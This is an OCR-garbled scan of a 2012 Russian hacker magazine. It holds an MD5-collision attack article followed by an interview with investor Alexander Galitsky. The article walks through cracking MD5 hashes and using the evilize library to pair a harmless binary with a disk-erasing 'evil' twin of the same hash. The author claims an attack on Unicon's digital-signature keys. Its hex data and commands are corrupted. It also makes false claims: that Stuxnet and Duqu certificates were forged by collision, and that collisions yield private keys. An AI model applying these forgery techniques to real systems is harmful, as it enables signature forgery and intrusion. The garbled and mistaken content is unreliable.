А = 0ХІ2АС2375 
В = 0ХЗВ341042 
С = 0Х5Р62В97С 
Р = 0Х4ВА763ЕР 



и задать входное сообщение 



ААЮОАВЕ 


097АВРР5 


ВВР0Е1С1 


32774244 


1006363Е 


72182090 


Е01С136Р 


9РА64О0Е 


98А1РВ19 


1РАЕ44В0 


236ВВ992 


6В7А779В 


1326Е065_ 


Р93ЕѲ972 


0458С868 


6В72746А 



то добавляя число 2 Л 9 к определенному 32-разряд ному слову 
в блочном буфере, можно получить второе сообщение с таким же 
хэшем. Есть несколько программ, которые помогуттебе все это 
дело провернуть (обрати внимание на ссылки в боковом выносе). 



МЕТОДЫ ПОЛУЧЕНИЯ ПРОФИТА 



Перед тем как начать практическую часть, мы должны добить 
теорию. Дело в том, что так называемые коллизии мы можем 
использовать в качестве ключа/пароля для аутентификации в раз- 
личном ПО и на веб-ресурсах. Это значит, что даже без знания па- 
роля, имея на руках только лишь его хэш, мы можем сгенерировать 
правдоподобный пассворд с помощью коллизии, причем за вполне 
приемлемое время. Однако на данный момент существуют и по- 
всеместно используются лишь несколько видов «взлома» хэшей 
М 04/5, то есть подбора сообщения с заданным хэшем. 

1. Перебор по зада иному словарю: никаких гарантий удачного 
результата нет, из плюсов можно отметить лишь малое время, 
затраченное на перебор. 

2. Брутфорс: банальный перебор случайных или последовательных 
комбинаций, большим минусом которого является значительное 
количествозатраченного времени и ресурсов компьютера. 

3. ПаіпЬоѵѵСгаск: атака по радужным таблицам является самым 
эффективным методом «взлома»; плюсзаключается в быстром 
переборе, минусы — в гигантском размере радужныхтаблиц 

и большом количестве времени, затраченном на их генерацию. 

Для полного перебора или перебора по словарю можно ис- 
пользовать, к примеру, следующие программы: РаззѵѵогсІзРго, 
М05ВРСРР, ЭоЬп 1Ье Ріррег. 



5ТІІХЫЕТ И ПОДДЕЛЬНЫЕ СЕРТИФИКАТЫ 



Надеюсь, ты не забыл историю с руткитом Біихпеі, когда 
троян-дроппер прогружал и запускал в системе свои драйверы, 
спокойно обходя всяческие системы предотвращения 
вторжений и антивирусы? Тогда при реверс-инжиниринге 
сэмплов выяснилось, что драйверы руткита были подписаны 
«настоящими» сертификатами крупных производителей 
контроллеров и чипов ЭМісгоп и ВеаКек. Было много шума, 
все кинулись обвинять эти компании в некомпетентности. 
Аналогичная история повторилась и с «братом» Біихпе* — 
червем Оіщи. На этот раз обвинили компанию С-Месііа ЕІесігоп- 
ІС5, сертификаты которой также были якобы украдены. Все 
вроде бы верно, но никаких краж возможно и не было! Я думаю, 
ты уже понял, о чем идет речь. Поддельные сертификаты 
были сгенерированы при помощи фундаментального бага — 
коллизий. Антивирусы, проверяя контрольную сумму файлов, 
не заметили никакого подвоха, а ведь все держалось именно 



на них :). Как бы парадоксально это не было, но существует 
ряд доказательств, подтверждающих мои слова. Во-первых, 
на одном закрытом форуме, где тусовались разработчики этих 
нашумевших руткитов (хотелось бы особо отметить человека под 
ником огг, статьи которого присутствуют на ряде авторитетных 
паблик-ресурсов, посвященных ИБ и реверс-инжинирингу: 
ѵѵоосітап и орепгсе), существовал топик о возможности кражи 
доверенных сертификатов. В нем приводился пример с йіщи, 
сертификат (с закрытым ключом) которого был сгенерирован 
с помощью коллизии. Во-вторых, если сравнить два сертификата 
(настоящий и тот, что был сгенерирован для йіщи) по размеру, 
то окажется, что существует хоть и малая, но все же разница 
в 15 байт! Таким образом, файлы получались разные по размеру, 
но одинаковые по контрольной сумме. История сукраденными 
сертификатами осталась бы практически незамеченной, если бы 
не работа независимых ИБ-исследователей. 



• Об алгоритме Мй5: 

Ьіиѵ/аѵѵВхКК: 

• интересная 
статья о коллизиях 
(матчасть): 

ЬіЫѵ/ЬуКгОи: 

• Мй5 СоІМзіоп 
бепегаіог: 

у /гЬКбЕс: 

• Еѵііііе: 

ЬИ.Іѵ/іЕВІ-т): 

• КаіпЬоѵѵМОБСгаск 
ЬуСоІІізіопБеагсИ: 

Ьіиѵ/ѵУКЦхІ: 

• статья Властимила 
Климы «О М05- 
коллизиях»: 

ЬіЫу/уРОЫиУ: 

• НазИСІазІі Ргате- 
ѵѵогк: 

ЬИ.1у/722оЬ: 

• научные работы 
Марка Стивенса 

о коллизиях: 

Ьіиу/гЫрНа . 



ХАКЕР 04/159/2012 



021 





С0ѴЕР5Т0КѴ 



Практика 



ОТ ТЕОРИИ К ПРАКТИКЕ 



Ну что же, теперь перейдем к долгожданной практике. Среди 
профессиональных криптоаналитиков есть вполне определенная 
классификация типов устойчивости алгоритмов хэширования, их 
всего три. 

1. СК2-КК — свободный от коллизий, устойчивый к коллизиям. 

2. СК1-КК — универсальный односторонний. 

3. СКО — универсальный. 

Также существуют три вида соответствующих атак для нахождения 
коллизий: 

1. СК2-КК — найти коллизии для конкретной функции. 

2. СР1-КК — подобрать к зада иному значению пару, образующую 
коллизию для конкретной функции. 

3. ско — найти коллизию для семейства функций. 

Сегодня я продемонстрирую тебе два первых вида атак на 
практике. Для начала приведу два блока данных в НЕХ (пара 
коллизий из научной работы китайского ИБ-исследователя Ван 
Сяоюня), их нужно вбить в Ьех-редакторе и сохранить в виде двух 
файлов: 

1- й файл 

сІ131сІсІ02с5е6еес4693сІ9а0б98а-р-Р95с2-РсаЬ587124б7еаЬ4004583еЬ8-РЬ7-( : 89 

55асІ340609Т4Ь30283е488832571415а085125е8-Р7ссІс99-РсІ91сІЬсИ : 280373с5Ь 

сІ8823е3156348Т5ЬаебсІассІ436с919сбсІсІ53е2Ь487сІа03ТсІ0239630бсІ248ссІа0 

е99-Р33420-Р577ее8се54Ь67080а80сІ1ес69821ЬсЬ6а8839396-Р9652Ь6-р-Р72а70 

2- й файл 

Ц131сШ2с5е6еес4693Ц9аѲ698аТТ95с2-РсаЬ5Ѳ712467еаЬ4ѲѲ4583еЬ8-РЬ7-Р89 

55асІ340609Т4Ь30283е4888325-Рі415а085125е8-Р7ссІс99-РсІ91сІЬсІ7280373с5Ь 

сІ8823е3156348Т5ЬаебсІассІ43бс919сбсІсІ53е23487сІа03ТсІ0239б30бсІ248ссІа0 

е99-Р33420-Р577ее8се54Ь67080280сІ1ес69821ЬсЬ6а8839396-Р965аЬ6-р-Р72а70 

Если сравнить размер и контрольную сумму в Мй5 у получен- 
ных файлов, то мы не заметим никакой разницы! Теперь давай 
найдем еще несколько коллизий к этим файлам. Программа Мй5 
СоІІівіоп Сепегаіог от Патрика Стэча поможет нам разобраться 
в атаке СР2-КК. Смело компилируй ее и запускай на исполне- 
ние. Первая коллизия на моем самом слабом компьютере была 
получена менее чем за 15 минут, а вторая — примерно через два 
споловинойчаса! Не так уж и плохо, согласись. 

Теперь перейдем к реальной атаке, для этого будем исполь- 
зовать эксплойт-библиотеку еѵіііге (снова обрати внимание на 
ссылки). После компиляции данной библиотеки в текущей дирек- 
тории должны появиться три файла: еѵіііге, тсібсоІІ и объектный 
файл дообеѵіі.о. В качестве подопытной программы будем исполь- 




Оригинальный сертификат 

зовать пример ЬеІІо-егаве.с, идущий в комплекте с исходниками. 
Итак, компилируем нашу программу и линкуем ее с объектным 
файлом дообеѵіі.о: 

§сс ЬеПо-егазе. с ^оосіеѵіі.о -о Ьеііо-егазе 

Смотрим контрольную сумму подопытного файла: 

тсІБзит . /беііо-егазе 

23сІЗе4873еЗеа619с7ЬсИбТа2сІѲ271е7 

/Ііоте/5а1:5ига/тсІ5со11/5оигсе/еѵі1І2е/Ііе11о-ега5е 

Разбиваем на блоки нашу полученную контрольную сумму, и за- 
пускаем на исполнение генератор М05-коллизий: 

. /тсІБсоІІ Ѳх23с13е487 ѲхЗеЗеабІЭ Ѳхс7ЬсИ6-Ра Ѳх2сІѲ271е7 > \ 
іпііі.ііхі: 

Далее запускаем еѵіііге для создания двух различных испол- 
няемых файлов с одинаковым размером и М05-хэшем. Смотрим 
на контрольную сумму и размер, а затем запускаем полученные 
бинарники: 

. /еѵіііге Ьеііо-егаве -с іпііі.ііхі: %оосІ -е еѵіі 

сіи -5Іі і/еѵіі . /§оосІ & тсІБзит .Ѵеѵіі _^§оосІ 
8,0К ./еѵіі 

8 Л ѲК ./§оосІ 

сІ8Ы : 211Ь61б24сІЗЗИ : еѲбс75ЬсІбеЗс89 . /еѵіі 
сІ8Ь-Р211Ь61б24сІ331-Ре0бс75ЬсІбеЗс89 . /^оосі 



НЕМНОГО ИСТОРИИ 



Ганс Доббертин нашел псев- 
доколлизии в Мй5, используя 
определенные инициализи- 
рующие векторы, отличные от стандартных. 



1996 



2004 



Китайские исследователи Ван 
Сяоюнь (ѴѴапд Хіаоуип), Фен Дэн- 
гуо (Репд йепддио), Лай Сюэцзя 
(І_аі Хиеііа) и Юй Хунбо (Ѵи НопдЬо) объявили об 
обнаруженной ими уязвимости в алгоритме, по- 
зволяющей находить коллизии за крайне малое 
время (1 час на кластере ІВМ р690). 



Те же самые Ван Сяоюнь и Юй 
Хунбо опубликовали алго- 
ритм, позволяющий найти две 
различные последовательности в 128 байт, 
которые дают одинаковый М05-хэш. 



2005 
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Опасный двойник 



./§ООСІ 

Неііо. ыогісі! 



./ еѵіі 

ТЬів рго§гат із еѵіі!!! 

Егазіп§ ЬагсІ сігіѵе. . .16Ь. . .26Ь. . . д изі: кісІсІіп§! 

І\Іо1:Ьіп§ ыаз егазесі. 

Как видишь, одна программа выводит известную всем безо- 
бидную фразу «Неііо, ѵѵогісі !», а вторая якобы стирает данные на 
диске. Мы можем переделать наш ЬеІІо-егазе.с так, чтобы вместо 
шуточного стирания данных произошло реальное, и тогда будет 
не до шуток. Но все это цветочки по сравнению со следующей 
атакой, которую я провел при своих исследованиях СР1-КК. 



ВЗЛОМ СР1-КК 



В качестве «жертвы» для исследований я выбрал цифровые 
ключи компании ІІпісоп, являющейся в Узбекистане монополи- 
стом в области ЭЦП (электронно-цифровой подписи) и серти- 
фикации. Основываясь на трудах Властимила Климы, я написал 
программу СРІ-КК-соІІізіоп кеудеп для подбора пары к значению, 



5эп]эп@0хг0еги0пп -/5 /ік)б»іі> ,/пгіБ соіі іѵ& 

Ыоск *і йоле 

Ыоск іійпе ѵ 
ИІ15 ідгдагі імі іі-013?]Р‘ { 

0x5(1499661, 0д24?І77?е, ОлЛІйІРІісЧ, 0x571x46*8. 
ОхБЫБааЭс, гЧг;. 0хЬе4Ь9О54, 0x093 307 сО, 

0х0МЗэ055. Ш2ЫЭШ. ОхэІаСісІЭЬ, 0х42е27т. 
ОхЗйсЬѲЗОО, ѲхссІ7Ь5505 р 0х91Ѳ511сс, 0x75889212, 
0жШЬс97с, 0хШ2е78а, 0*02442 сбе. 

0хЬЫбй54е, Ѳх^8сс2(ІЭ, 0х162е4946, Охаіі51Ьа4с, 
0x78864015, 0хс9 37Э2*С, 0x50293 Па. 0 x84а 1о4В6. 
0хЗВѲ73«0, Йй0ЪШ74», 0x7033156*7, 0х*Ь7е0*7?, 



ііпѵ і упегі ни гг. і Г 3 2 ] • ( 

9х5г[499561, 0x2421 Г72е, ЭхаШеб<.9, ѲяБіЬсЖеЬ, 
0хеЬ45«2С, 0x04341*81, 0хЬ«4Ь9О54. 0х85 ЭЭ 07 
0Ѵ00330ЙББ, О*п?Ь2ЭЬ0&. &ХЗІЭѲСІ9І), 0Х<І2е2**73, 
ОуЗсГсЬѲООѲ, Оис^ 7ЬБ505 , Ох 11 ОБ Нее. 0x75889212, 
0х{ШЬс97с, ОхсіМбйега, 0хі742е73э, 6x0244 2 сбе, 
9x36*68540, Ѳх*48ес24Э, 0х1б2е49-1б, 0хд851ба4с, 
0х7аЬ6а01Б, 0хс037321е, 0x502937 7а. 0х04а1&4ѲБ, 
1>хаіЮ73с*8. Ѳх1вЬМВ7*. ОхГеэЗЕзбГ?, Ох*І>7с0І72, 



р а п і ,і г^Ох гОО ІЦ0ПЧ -7 5/іпгіБс ріі > 



Генерируем коллизии 




Коллизия в действии 

і образующей коллизию для конкретной функции при генерации 
і электронно-цифровых ключей. Изначально было несколько 
і данных, которые я и использовал в качестве входных параме- 
тров. Очень облегчил задачу тот факт, что пароль для закры- 
той ЭЦП у всех сертификатов один и тотже: 000000. Это была 
фатальная ошибка — самая грубая из встреченных мной за весь 
опыт работы в области ИБ. Имея на руках только контрольные 
суммы файлов и открытые ключи, мне удалось сгенерировать 
і примерный оригинальный закрытый ключ для подписи раз- 
і личного рода документов, ключей и идентификации пользова- 
і теля в нескольких СРМ-системах (к примеру, Е-Ьіщаі от того же 
монополиста). Проделанную работуты сможешь увидеть воочию 
на соответствующих скриншотах, в консоли же все это выгляде- 
ло примерно так: 

С : \с о 1 1_1: е 5 1: > тсІБзиш^ 

І Ь2с11а3-Рб3-Р9784е0-Ре8с237-Р-Р2484а78 *кеу( (/РакесІ Ьу соііізіоп). 

І кеу 

аб54ЬсІ7ѲѲЬ5ебс-Р47саѲЬѲ42Ь2-РЗѲ575 *сег (-РакесІ Ьѵ соііібіоп) .сег 
с5с!бааа28б3931бб14еЗсІ95987-РсЬб12 *р-Рх(-РакесІ Ьѵ соііібіоп’) .р-Рх 
а654М7ѲѲЬ5е6с-Р47саѲЬѲ42Ь2-РЗѲ575 *сег.сег 

і Как видишь, у сертификатов сег.сег и сег(1акес1 Ьу соІІізіоп).сег 

і одинаковая контрольная сумма. 



ЗАКЛЮЧЕНИЕ 



Надо признать, что М05-хэши стали неотъемлемой частью на- 
шей жизни. Они вездесущи. Их используют в качестве алгорит- 
мов для хэширования паролей как в программном обеспечении, 
так и на веб-ресурсах. Они не зависят ни от платформы, ни от ОС, 
на которых исполняются. Векторы атак также довольно широки: 
от банкоматов до цифровых подписей, от авторизации клиент- 
сервер и до целостности передаваемых по сети файлов. Являясь 
быстрыми и менее криптостойкими, 128-битные алгоритмы 
хэширования принесут еще немало бед. На сегодняшний день 
коллизии и псевдоколлизии были найдены в большом ряде алго- 
ритмов, среди которых Мй2, МБ4, Мй5, йЕ5, 0Е5-ЮЕА, РІРЕ- 
МР, НАѴАІ_(~128, -256), 5НА-1, ГОСТ Р 34.10-2001 и так далее. Со 
временем этот список будет только пополняться. НЕ 



2006 



Чешский исследователь 
Властимил Клима опубли- 
ковал алгоритм, дающий 
возможность находить коллизии на обычном 
компьютере с любым начальным вектором 
(А,В,С,Р) при помощи метода, названного им 
«туннелирование». 



Эдуардо Диаз по специально 
разработанной схеме создал 
два различных архива с двумя 
разными программами, но абсолютно иден- 
тичными Мйб-хэшами. 



Дидье Стивенс использовал 
библиотеку еѵіііге для соз- 
дания двух разных программ 
с одинаковым кодом цифровой сигнатуры 
(АиіМепіісосІе сіідііаі зідпаіиге), аиІЬепІісосІе 
используется МісгозоН для подписи своих 
библиотек и исполняемых файлов. 



2007 



2009 
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СОѴЕК 5Т0ГСѴ 



Наш гость -удивительный человек. Он начинал свой путь 
как инженер и разрабатывал архитектуру компьютеров для 
спутников слежения. Его команда создала первые рабочие 
образцы ѴѴі-Рі и раньше всех представила программную 
реализацию ѴРЫ для ѴѴіпсІоѵѵз. Запустив несколько 
технологических компаний, Александр Галицкий основал 
венчурный фонд АІпгіаі Сарііаі Рагіпегз, который хорошо 
известен не только в России, но и в Силиконовой долине. 



НАЧАЛО КАРЬЕРЫ 



Мой путь начинался в Советское время. Все 

мальчишки с периферии мечтали пробиваться 
через технические направления. Я хотел про- 
биваться через космос. Мне повезло — я попал 
на работу к человеку, который был генераль- 
ным конструктором систем спутниковой раз- 
ведки и наблюдения. 

Из фривольной научной работы я сразу 
окунулся в тяжелые бессонные ночи про- 
граммистов, вкалывающих, чтобы запустить 
первый спутник наблюдения с цифровым изо- 
бражением. До этого все спутники еще делали 
с отстреливающимися кассетами на фотоаппа- 
ратах. Мы делали первый спутник с системой 
запоминания и передачей данных через гео- 
стационарные спутники. Я оказался в команде, 
когда все железо уже сделали, а софт, как это 
часто тогда бывало, не работал. 

Мой шеф — Геннадий Яковлевич Гусь- 
ков — был настоящим предпринимателем. 

Он обладал теми качествами, которыми от- 
личались, например, Стив Джобс или Королев. 
В нем было много авантюризма, техническое 
видение и тонна идей. Например, очень пока- 
зательный момент: в Россию приезжал Никсон 
и встречался с Брежневым. Он привез с собой 
несколько чемоданов, развернул их, достал 
оттуда телефон и начал связываться со своими 
посольствами в разных странах. Это, конечно, 
произвело дикое впечатление. Был 1972 год! 

И Брежнев, естественно, заявил, что к поездке 
в Америку он хочет иметь такую же систему. 

Все ответили, что это невозможно, и только 
мой босс сказал: «Я это сделаю». И сделал. 

К отъезду Брежнева в Штаты все было обеспе- 
чено: специальный десант высадился на Кубе 
для развертывания систем резервирования 
и управления спутником... Но, тем не менее, 
Брежнев смог достать свой чемодан, снять 
трубку и продемонстрировать, что «мы ничем 
не хуже, чем они». 

Просто бешеное количество денег и сил 
тратилось тогда на все эти разработки. Воз- 
можно, это было не совсем правильно с точки 
зрения экономики и прочего, но, тем не менее, 
эта часть достижений и доказательств нашей 



технической мощи была сильно развита. И это 
воспитывало в нас такую... систему сраже- 
ния. Поэтому я рос в этой системе достаточно 
быстро. 

Помню, шеф вызвал меня, и мы долго 
обсуждали архитектуру нового компьюте- 
ра — как он должен строиться. Я исходил из 
программистских начал — меня не устраивали 
существующие системы программирования: 
мы не могли легко менять код на ходу. То есть, 
технически — могли: спутники управлялись 
с Земли, и мы, естественно, корректировали 
код со станции управления, софт помогал 
исправлять много допущенных аппаратных 
ошибок. Но все это требовало очень больших 
усилий, титанических бессонных ночей. И, ко- 
нечно, мы все время пытались это совершен- 
ствовать. Когда началась разработка новой 
архитектуры, со стороны софта уже пошел 
перелом — мы влияли на аппаратуру, и нас 
стали больше слушать. По сути дела, началась 
конкуренция за создание новой архитектуры. 

Мой босс сказал, что если я хочу сделать 
свою архитектуру, у меня есть две недели 
на формирование подразделения. До этого 
у меня, конечно, была куча софтовых инжене- 
ров, но тут — пожалуйста: бери разработчиков 
чипов, бери разработчиков, которые будут 
платы разводить и воплощать архитектуру 
в «железо». Соответственно, можно было по- 
высить ставки сотрудников в среднем на 10% - 
это был достаточный бюджет, чтобы я мог их 
переманить. Нельзя ведь нанять толпу народа 
с улицы: они не прошли бы проверку по спец- 
службам, а нужно было много людей. И вот я 
начал ходить внутри и сманивать специали- 
стов на новую перспективную работу, тем са- 
мым наживая себе кучу врагов: меня обзывали 
«карьеристом», негодяем, человеком, идущим 
по трупам... В общем, я выслушал о себе 
кучу нелестных вещей. Тем не менее, в таких 
обстоятельствах понимаешь — утебя есть две 
недели, тебе нужно сформировать подразде- 
ление. У тебя есть светлая идея что-то реали- 



зовать, и ты за нее борешься. Так и закалялся 
характер, в таких вот сражениях-боях. 



СОТРУДНИЧЕСТВО С 51) N 



Моя первая встреча с основателями 5іш 
Місговувіетз состоялась в 1990 году. К нам 

в страну впервые приехали люди, с кото- 
рыми мы имели право встречаться. Правда, 
только через совместное предприятие — они 
создавались специально и контролировались, 
дабы мы могли общаться, но были скрыты. 
Тогда к нам приезжал Билл Джой и еще один 
активный человек — Джон Гейдж, который 
в то время был их директором по науке. 

Мы с Биллом Джоем одного возраста, и у 
нас во время разговора пошло нечто вроде 
противостояния. Я начал излагать какие-то 
вещи — они стали удивляться. Ведь их кто-то 
заманил в Советский Союз, дикую в их глазах 
страну. В ходе этих дебатов я все время на- 
ходил какие-то аргументы. В определенный 
момент нашего спора я полез в карман и до- 
стал оттуда 22-слойную полиамидную плату, 
что ввергло их в полный осадок. В то время 
в Америке их делали где-то в 8 слоев, и у них 
она не получалась, — а тут целых 22 слоя! 

Наша компания тогда отличалась тем, 
что мы сидели на стыке микроэлектроники 
и космической аппаратуры. Была придумана 
схема: чтобы решать проблемы габаритов, 
мы делали бескорпусную аппаратуру. То есть, 
корпуса снимались, и только чипы ставились 
на плату. Тогда весь мир начал смотреть в эту 
сторону, и позже даже 5ип выпустил некий 
компьютер, где БРАРС-процессор был именно 
бескорпусный. 

Естественно, это произвело на 5ип какое- 
то невероятное впечатление. Была осень 1990 
года, когда они приехали к нам в Зеленоград 
на суперзакрытое предприятие. Там мы снова 
много говорили, показали им еще что-то... 

У них загорелись глаза, появились мечты — 
у Бііп вообще амбиций много. Мол, как насчет 
закинуть 5РАРС в космос? Для них же это 
понты — 5РАРС в космосе, это же круто! Іпіеі 
в космосе, и 5РАРС тоже в космосе. А Билл 
Джой, как и все: в джинсах, в кроссовках. 
Ходит, танцует, выпендривается. Шеф говорит 
мне: «Что за ненормальный такой?» :). 

В 1991 году мы впервые поехали в США, 
где проходил первый Советско-американский 
космический конгресс. С этим связано немало 
смешных историй. Например, мы вывезли 
туда очень много разного железа, включая 
наш ядерный двигатель для космоса, луноход, 
нашу ранцевую аппаратуру связи с плоскими 
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СОѴЕВ 5Т0ГСѴ 



антеннами, которую использовали наши служ- 
бы. И это все запретили вывозить обратно :). 
Потому что по какому-то там закону — ввозить 
можно, а вывозить нельзя. 

Тогда Бип'овцы пригласили меня приехать 
к ним в Калифорнию. В то время нас обхажи- 
вали все — ІВМ, НР... Но все они были такие 
очень формальные: в галстуках, костюмах, 
вели сложные разговоры. И помню, я приле- 
тел в Бип, встретился там со своим нынешним 
партнером Джеффом Байером. Он сидел такой 
в джинсах, в каких-то тапочках на босу ногу, 
все так расслабленно... И я подумал: «Вот, 
это правильные пацаны, с которыми надо 
работать! Что там какие-то ІВМ и НР». Так и за- 
вязалась дружба. 

В один момент Бип прислала нам 15 
компьютеров, стоимостью каждый по 25 
000 долларов. Ну что с ними делать? Надо 
работать. Я пошел сдавать их на госкомпанию. 
Но госслужба по советскому закону не могла 
взять от частного лица подарок на такую 
сумму, а таможня тогда с частных лиц денег 
не брала. И один мой товарищ сказал: «Что 
ты мучаешься, ну не берут их у тебя — открой 
компанию». А открыть компанию занимало два 
дня... Мы пошли и открыли. Так и образовалась 
моя первая компания. 



О СОЗДАНИИ ѴѴІ-РІ 



К концу 80-х мы начали вести испытания ІР- 
протокола через наши системы передачи дан- 
ных. Я был апологетом ІІпіх-систем и считал, 
что ІР-протокол позволяет нам делать очень 
много независимых вещей. Это, в отличие от 
РБР'шных или ОЕС'овских, открытые про- 
токолы, соответственно, с их помощью можно 
много чего организовать в сетях. Нам нужно 
было передавать для «звездных войн» целую 
кучу потоковой информации, сливать с разных 
маленьких спутников. Это можно было делать 
единственно таким вот образом. Новорожден- 
ной России все это уже было не нужно. 

Мы к этому времени уже начали сотрудни- 
чать с Бип. И вот они присылают нам спец- 
ификацию и говорят: «Есть протокол 802.11, 
который сейчас находится в разработке, а вы 
можете сварганить РСМСІА-карточку?». Ну, я 
и собрал команду... 

Сам протокол 802.11 мы, конечно, не изо- 
брели. Этим занимается Іпіегпеі Епдіпеегіпд 
Тазк Рогсе. Мы, конечно, писали какие-то 
дополнения. Считать нас родителями ѴѴі-Рі не- 
правильно, но первые рабочие образы сделали 
мы. В общем, были пионерами. 

Мы побили Моіогоіа, военных, и много 
кого еще. Была интрига: ведь Бип раздал 
конкурентные предложения нескольким фир- 
мам. И вот мы, какие-то непонятные русские, 
привозим работающий образец. Все в шоке 
и в трансе. Бип принимает решение, что в нас 
надо инвестировать. Для них это была во- 
обще первая в истории компании инвестиция 
в кого-либо. 



В 1993 году мы впервые продемонстриро- 
вали работу РСМСІА-карточек ѴѴі-Рі, работаю- 
щих на скорости 4 Мбит/с. Это было на выстав- 
ке I піегор в Париже. 

ѴѴі-Рі в то время был нафиг никому не 
нужен! Ни в России, ни на Западе. Для Бип 
это было непрофильное направление, поэтому 
вместе с ними мы поехали к Егісззоп, самой 
революционной компании в данной сфере на 
тот момент. Егісззоп активно продавала НР І_Х 
со своим радиомодемом — первый «носиль- 
ный» компьютер, раскладушечка такая. Ее все 
начали усиленно покупать. Было видно — чело- 
век машину останавливает, антенну открывает, 
бах-бах-бах, и почту получил. Скорости 19.2 
кбит /с было более чем достаточно. Приложений 
к письмам тогда не было — почта была чисто 
текстовая. Поэтому нам ответили: «Куда нам 
такие скорости? Нет рыночной потребности». 

«Какие же мы были тогда чудаки!», — го- 
ворил мне СЕО Егісззоп, когда мы встречались 
с ним в 2003-2004 году. 

Бип нас использовала чисто для своих 
нужд. Им было интересно кидать нам какие-то 
нерешаемые задачи, и мы пытались их решить. 
В Боіагіз мы выгребали баги, к немуже писали 
модули. Было очень много проектов в сотруд- 
ничестве с Эриком Шмидтом, который тогда 
был президентом софтового подразделения, 
а затем СТО компании. Я подбирал заказы, 
смотрел, что там неправильно, мы лепили про- 
дукты и продавали их за большие деньги. 



О ПРЕДПРИНИМАТЕЛЬСТВЕ 



Вся история 90-х строится на том, что мы 
были воспитаны на инженерной науке, на 

создании этих, в каком-то смысле единичных, 
образцов, чтобы удивить мир. Чтобы показать, 
что «мы не хуже». Коммерческая составляю- 
щая ни у кого не сидела в голове — было жела- 
ние сделать и удивить. 

Когда мы делали первый ѴРІМ, интернета 
еще толком не было, браузер появился позже. 
Сервер, установленный в нашей компании 
«Элвис+», был в первой полусотне (если не 
в числе первых нескольких десятков) веб- 
серверов в мире. В этой эйфории мы ползли 
за Бип'ом, который «присылал нам девять тонн 
оборудования». Мы начали строить мейл- 
серверы — это направление потом выродилось 
в компанию «Элвис Телеком». К примеру, 
мы делали факс-серверы -у МісгозоЙ такой 
появился только где-то в конце 90-х годов. 

Мы пионерили во многих этих вещах. 

И сейчас вспоминаешь и думаешь: «Вотты хо- 
дил по таким кладезям идей, и если бы кто-то 
мог правильно вложить бизнес-науку...». Было 
множество инноваций, но мы не знали, как ими 
распоряжаться. Для меня бизнес тогда был 
простой: что-то сделать, продать, заработать 
деньги. 

У нас было много собственных идей, 
но для нас было важно знать, «что проис- 
ходит на кухне». Интернет не был сильно 



развит как сейчас. Ты не можешь пригото- 
вить что-то вкусное, если не был на кухне: 
ты должен видеть, что делает повар. Я тогда 
проводил много времени в Кремниевой 
долине и был такой абсолютно уникальный 
для них человек, поэтому меня таскали на 
разные совещения (наверное, с мыслью, что 
я скажу что-нибудь умное). И Скотт Макнили, 
и Энди Бэчтольшайм, и Билл Джой, и Эрик 
Шмидт. Когда я был в фирме, они все время 
демократично приходили на обед со всеми 
сотрудниками, но садились за отдельный стол 
и туда приглашали людей, с которыми хотели 
беседовать. Меня звали всегда. 

Я просто слушал чужие беседы. Исходя из 
этих бесед, я выносил сведения о каких-то ды- 
рах, которые тогда существовали. Одна из дыр, 
которую я подметил, — это реализация ѴРІЧ, 
который нужен был для интернета, потому как 
не было защищенных каналов. Тогда я осо- 
знал, что Бип нифига не понимает в ѴѴіпсІоѵѵз 
и сказал: «Все, парни, делаем все в ѴѴіпсІоѵѵз!». 
И мы взломали эти ІМБІБ-драйверы, которые 
МісгозоЙ не публиковала. Выполнили реверс- 
инжиниринг, на который американцы либо 
неспособны, либо не делали его по этиче- 
ским соображениям, и разработали ѴРІЧ. Так 
появился Бип Бсгееп Е+ и позже — российская 
«Застава». 



СОЗДАНИЕ ВЕНЧУРНОГО ФОНДА 



Я начал вкладывать в интересные проекты 
свои личные деньги. Но потом решил — нет, 
что-то неправильно, нужно что-то менять, 
нужно решать это более комплексно. Нужно 
сделать фонд, который будет решать эту про- 
блему в более масштабном виде. Так я начал 
двигаться к своему фонду. 

Меня начало увлекать, что есть много 
интересных компаний, у которых нет знаний, 
а я мог бы с ними поделиться, потом вложить 
куда-то деньги. 

Я очень люблю молодых предпринима- 
телей, которые говорят совершенно новые 
и порой непонятные вещи... Но главное, чтобы 
они говорили на понятном языке... 

Все суперкомпании создавались людь- 
ми в возрасте от 20 до 30 лет. Но если брать 
статистику потерянных компаний и компаний, 
которые выстрелили для венчурного капи- 
талиста, то, напротив, получается, что нужно 
вкладывать в людей, которым уже 40-50 лет 
:). У них есть опыт и они, по крайней мере, 
доводят до логического конца то, что созда- 
ют. И пусть на них не заработать 1000%, как 
на Соодіе или на чем-то там, но ты получишь 
5-, 10-кратный возврат инвестиций. 

Должен быть баланс между риском 
вложения денег в очень молодые головы и в 
состоявшихся предпринимателей (так назы- 
ваемых гереаіесі епігергепеигз), которые либо 
имели неуспешный бизнес и пытаются вести 
успешный, либо уже сделали успешный и те- 
перь хотят создать еще лучше. У последних, 
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по меньшей мере, есть жила преодолеть все 
болевые точки, удары, и они дойдут до конца, 
они все это уже проходили. А молодой человек 
даже с суперсветлой идеей может сломаться, 
или его вообще понесет в десяток других идей, 
поэтому есть неуверенность в этом деле. 

В фонде АІтаі 2 мы планируем вложиться 
где-то в сорок компаний очень ранней стадии, 
когда они еще требуют небольших денег. 

Но мы будем это делать вместе с акселерато- 
рами, либо с какими-то инкубаторами. Кто-то 
другой будет «нянчить» всех этих людей, 
которые будут звонить по ночам и задавать 
вопросы. Нас не хватит на них. Но мы сможем 
подобрать их на следующей стадии, когда они 
уже немного оперятся и смогут двинуться на 
следующий этап. 

Наш фонд старается не участвовать в опе- 
ративном управлении компаний, в которые 
инвестировали. Да, приходится влиять на 
него. Иногда. Но забирать эту пальму пер- 
венства у антрепренера — самоубийство, 
и мы стараемся этого никогда не делать. 




В некоторые ниши мы не вкладываем- 
ся. Например, в е-соттегсе, где логистика 
серьезная завязана — это требует очень 
много денег. Мы все-таки небольшие фонды, 
и рассчитываем вложить (в «Алмазе», по 
крайней мере) за время жизни семь, макси- 
мум пятнадцать миллионов в команду. Этого 
явно мало для построения такого бизнеса как 
е-соттегсе и уверенности, что эта компания 
взлетит и куда-то двинется. 

Нам ближе софтверные компании. У них 
большие риски, но они измеримы в реальных 
деньгах, которые мы можем дать. Даже если 
компании требуется больше чем пятнадцать 
миллионов, с каким-то партнером ты можешь 
это сделать. 

У нас есть четкое требование: мы хотим 
видеть, что это миллиардный рынок. При- 
чина проста: мы должны быть уверены, что 
у компании есть возможность маневрировать. 
Если компания врывается на только откры- 
вающийся рынок (даже если этот рынок очень 
интересен в перспективе, но его размер со- 
ставляет всего порядка двадцати миллионов), 



и там уже существуют двадцать компаний по- 
